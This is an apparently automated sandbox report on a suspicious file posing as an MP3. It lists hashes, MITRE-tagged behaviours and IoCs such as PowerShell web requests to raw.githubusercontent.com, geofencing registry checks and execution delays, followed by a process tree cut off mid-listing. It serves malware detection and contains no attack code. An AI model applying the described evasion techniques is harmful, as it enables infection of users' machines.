b74577a99903aeadc8f89af84b81374e9e1a25562861cf4aff2d8a211cbe68db

Analysis

max time kernel
232s
max time network
237s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2025, 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fart-with-extra-reverb.mp3
Size

121KB
MD5

56a2f872e5106165bb09f2952c467114
SHA1

a492b74ceb9f5fc5cf4ff26ec96d063bbcb58230
SHA256

b74577a99903aeadc8f89af84b81374e9e1a25562861cf4aff2d8a211cbe68db
SHA512

5deadc5b63296e9224dd7a72b4220f5b47917fb4a31f97863308f78fa9f7f373aebf07850c81e3632de9c5b040cd9c014851e8a978ef44d1df7ec34f7975955f
SSDEEP

3072:2TfH2lqavCLMpbhmO1FBBU4YJjq4ht+lSCtTaAoUAX4:eH2lq/Qbhm6jYJjq43fCtTaAon4

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
125	5604	powershell.exe
127	5604	powershell.exe
139	5404	powershell.exe
140	5404	powershell.exe
148	5984	powershell.exe
150	5984	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5604	powershell.exe
5404	powershell.exe
5984	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\S:	wmplayer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
121	raw.githubusercontent.com
122	raw.githubusercontent.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3004	2120	WerFault.exe	83

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	robux.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
1496	timeout.exe
5648	timeout.exe
5132	timeout.exe
4244	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133859252349130459"	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-925314154-1797147466-1467878628-1000\{80CD5326-60BE-4B62-BDFE-65112E4100FE}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-925314154-1797147466-1467878628-1000\{C68C84E4-3E32-42A4-9B26-D688CC6F9A84}	wmplayer.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings	cmd.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 714608.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2948	msedge.exe
2948	msedge.exe
316	msedge.exe
316	msedge.exe
3368	identity_helper.exe
3368	identity_helper.exe
5444	msedge.exe
5444	msedge.exe
5604	powershell.exe
5604	powershell.exe
5604	powershell.exe
4716	msedge.exe
4716	msedge.exe
5404	powershell.exe
5404	powershell.exe
5404	powershell.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
5984	powershell.exe
5984	powershell.exe
5984	powershell.exe
2940	chrome.exe
2940	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2172	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

pid	Process
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2120	wmplayer.exe
Token: SeCreatePagefilePrivilege	2120	wmplayer.exe
Token: SeShutdownPrivilege	1868	unregmp2.exe
Token: SeCreatePagefilePrivilege	1868	unregmp2.exe
Token: 33	3668	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3668	AUDIODG.EXE
Token: SeShutdownPrivilege	2120	wmplayer.exe
Token: SeCreatePagefilePrivilege	2120	wmplayer.exe
Token: SeShutdownPrivilege	2120	wmplayer.exe
Token: SeCreatePagefilePrivilege	2120	wmplayer.exe
Token: SeShutdownPrivilege	2120	wmplayer.exe
Token: SeCreatePagefilePrivilege	2120	wmplayer.exe
Token: SeShutdownPrivilege	2120	wmplayer.exe
Token: SeCreatePagefilePrivilege	2120	wmplayer.exe
Token: SeDebugPrivilege	5604	powershell.exe
Token: SeDebugPrivilege	5404	powershell.exe
Token: SeDebugPrivilege	5984	powershell.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	1540	shutdown.exe
Token: SeRemoteShutdownPrivilege	1540	shutdown.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2120	wmplayer.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
184	SndVol.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe

Suspicious use of SendNotifyMessage 58 IoCs

pid	Process
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
316	msedge.exe
184	SndVol.exe
184	SndVol.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2120 wrote to memory of 1476	2120	wmplayer.exe	84
PID 2120 wrote to memory of 1476	2120	wmplayer.exe	84
PID 2120 wrote to memory of 1476	2120	wmplayer.exe	84
PID 1476 wrote to memory of 1868	1476	unregmp2.exe	85
PID 1476 wrote to memory of 1868	1476	unregmp2.exe	85
PID 316 wrote to memory of 1528	316	msedge.exe	109
PID 316 wrote to memory of 1528	316	msedge.exe	109
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 4296	316	msedge.exe	110
PID 316 wrote to memory of 2948	316	msedge.exe	111
PID 316 wrote to memory of 2948	316	msedge.exe	111
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112
PID 316 wrote to memory of 4484	316	msedge.exe	112

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\fart-with-extra-reverb.mp3"
1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\SysWOW64\unregmp2.exe
  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\system32\unregmp2.exe
    "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 2320
  2⤵
  - Program crash
  PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:4488

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320 0x2e4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2120 -ip 2120
1⤵
PID:3368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffba52e46f8,0x7ffba52e4708,0x7ffba52e4718
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
  2⤵
  PID:64
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
  2⤵
  PID:5176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:5832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,13061490950425743179,3167092752443844155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
